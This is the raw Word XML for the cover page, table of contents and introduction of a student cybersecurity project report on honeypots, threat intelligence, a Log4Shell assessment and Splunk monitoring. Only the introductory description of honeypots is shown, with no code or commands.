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50E4" w14:textId="77777777" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CENTRE FOR DEVELOPMENT OF ADVANCED COMPUTING (C-DAC), THIRUVANANTHAPURAM, KERALA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A229A6" w14:textId="77777777" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59249195" w14:textId="77777777" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A PROJECT REPORT ON –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C38A9F" w14:textId="1EED6CE5" w:rsidR="0059754E" w:rsidRPr="00CC6197" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Integrated Threat Intelligence, SOC Monitoring &amp; Vulnerability Assessment Using Honeypot-Based Attack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB29901" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="00CC6197" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A670256" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="00CC6197" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC06047" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRPr="0059754E" w:rsidRDefault="00CC6197" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FB2832" w14:textId="7D2FAB44" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B22CB51" wp14:editId="48497BEB">
            <wp:extent cx="1276746" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54546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0717" cy="11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949" w14:textId="7FA63164" w:rsidR="0059754E" w:rsidRPr="00CC6197" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG-DCSF August 202</w:t>
      </w:r>
      <w:r w:rsidR="00CC6197" w:rsidRPr="00CC6197">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386577B9" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="00CC6197" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757FF26B" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="00CC6197" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C885F" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRPr="0059754E" w:rsidRDefault="00CC6197" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6962C1F9" w14:textId="359B8AE5" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BY Group Number – 06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB86426" w14:textId="057FA76B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pradhun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prakash Jacob</w:t>
      </w:r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260260940038</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E6AE7E" w14:textId="48692A11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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gacche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pratiksha Ram</w:t>
      </w:r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260260940039</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C0E373" w14:textId="4B20E7CB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r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akula Naveen Kumar</w:t>
      </w:r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260260940006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E29E26" w14:textId="384BB30E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r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mohit Raghunath </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Baraskar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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260260940031</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9FCCF" w14:textId="7539945A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r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Likhitha Panneeru</w:t>
      </w:r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260260940027</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC46559" w14:textId="0D46742A" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="10"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Neethu P Surendran</w:t>
      </w:r>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CC6197">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                </w:t>
      </w:r>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PRN: 260260940033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870BA22" w14:textId="77777777" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="10"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A18A08" w14:textId="77777777" w:rsidR="0059754E" w:rsidRDefault="0059754E" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18787C5F" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="00CC6197" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C2E6AE" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRPr="0059754E" w:rsidRDefault="00CC6197" w:rsidP="0059754E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3140C7D2" w14:textId="70ED98EC" w:rsidR="0059754E" w:rsidRPr="0059754E" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Under The Guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27735975" w14:textId="77777777" w:rsidR="00CC6197" w:rsidRDefault="0059754E" w:rsidP="00CC6197">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="10" w:after="10"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mr. Jayaram</w:t>
      </w:r>
      <w:r w:rsidR="00CC6197">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                 </w:t>
      </w:r>
      <w:r w:rsidR="00CC6197" w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mr. Jayaram</w:t>
      </w:r>
      <w:r w:rsidR="00CC6197">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B866E" w14:textId="3E4C1679" w:rsidR="0059754E" w:rsidRDefault="00CC6197" w:rsidP="0037016F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="10" w:after="10"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Centre Coordinator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Poject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E004BE1" w14:textId="77777777" w:rsidR="0037016F" w:rsidRPr="0037016F" w:rsidRDefault="0037016F" w:rsidP="0037016F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="10" w:after="10"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B02AD7" w14:textId="412CCEEF" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68372C" w14:textId="59B4B6EC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1. Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48196E3F" w14:textId="6AFBD203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2. Local Honeypot Deployment Using Cowrie</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A749DF" w14:textId="4E6DF27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2.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9A177" w14:textId="602D8C5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2.2 Architecture and Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70442792" w14:textId="04DA6310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2.3 Deployment Code / Commands</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF07F9" w14:textId="491722CC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2.4 Attack Simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D19FB8" w14:textId="179EB89D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2.5 Execution Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE91B88" w14:textId="3F1D23F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3. Cloud Honeypot Deployment on AWS EC2</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1F80A" w14:textId="5BF9BF21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3.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="752563FB" w14:textId="17262D42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3.2 Deployment Steps</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="367997E9" w14:textId="2EA2EF6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3.3 Real-World Attack Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C585B5" w14:textId="3BC725A0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3.4 Execution Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A75635" w14:textId="7CA62B06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4. Threat Intelligence Analysis Using Python</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA306FF" w14:textId="200A17C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4.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48503303" w14:textId="16ECA7E4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4.2 Code Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1D3C7" w14:textId="430A4608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4.3 Report Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E66364" w14:textId="7577BDD3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4.4 Execution Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FD4F6" w14:textId="3FB0DF4E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5. Vulnerability Assessment &amp; Penetration Testing (Log4Shell)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7919AEEA" w14:textId="0D4F7C4B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5.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69584722" w14:textId="26695724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5.2 Exploitation Steps and Code</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AADD491" w14:textId="786012CE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5.3 Execution Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0AA1F" w14:textId="5AC24289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6. SIEM Integration Using Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B5361" w14:textId="57740FA0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6.1 Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CAB4A3" w14:textId="7AA6D16C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6.2 Data Ingestion</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680A98D" w14:textId="2E4C229C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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   6.3 Dashboard and Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F58C58" w14:textId="440E3F8A" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9350"/>
        </w:tabs>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2715EB34" w14:textId="64536D2E" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9350"/>
        </w:tabs>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. References</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7525D">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EECFE90" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00C7525D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE9788" w14:textId="1E159873" w:rsidR="008C6073" w:rsidRDefault="00000000" w:rsidP="005A0CD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B443C" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRPr="00C7525D" w:rsidRDefault="005A0CD5" w:rsidP="005A0CD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4037FF3E" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00C7525D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This project implements an end-to-end cybersecurity threat detection and analysis system built around three integrated components: a honeypot deployed both locally and on a public cloud server, a Python-based threat intelligence pipeline for log analysis, and a Vulnerability Assessment and Penetration Testing (VAPT) exercise against a real, critical software vulnerability. A Security Information and Event Management (SIEM) platform, Splunk, was additionally configured to centralize, visualize, and analyze the collected data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47C843" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00C7525D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A honeypot is a decoy system deliberately designed to appear as a legitimate, vulnerable target so that attackers interact with it instead of real infrastructure, while every action they take is silently logged. This project uses Cowrie, an open-source SSH/Telnet honeypot, deployed first in a controlled local environment and then on a public-facing AWS EC2 instance. The local deployment was used to simulate realistic attacker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 xml:space="preserve"> under controlled conditions, while the cloud deployment was left exposed to the public internet to capture genuine, unsolicited attack traffic from real-world sources.</w:t>
      </w:r>
    </w:p>
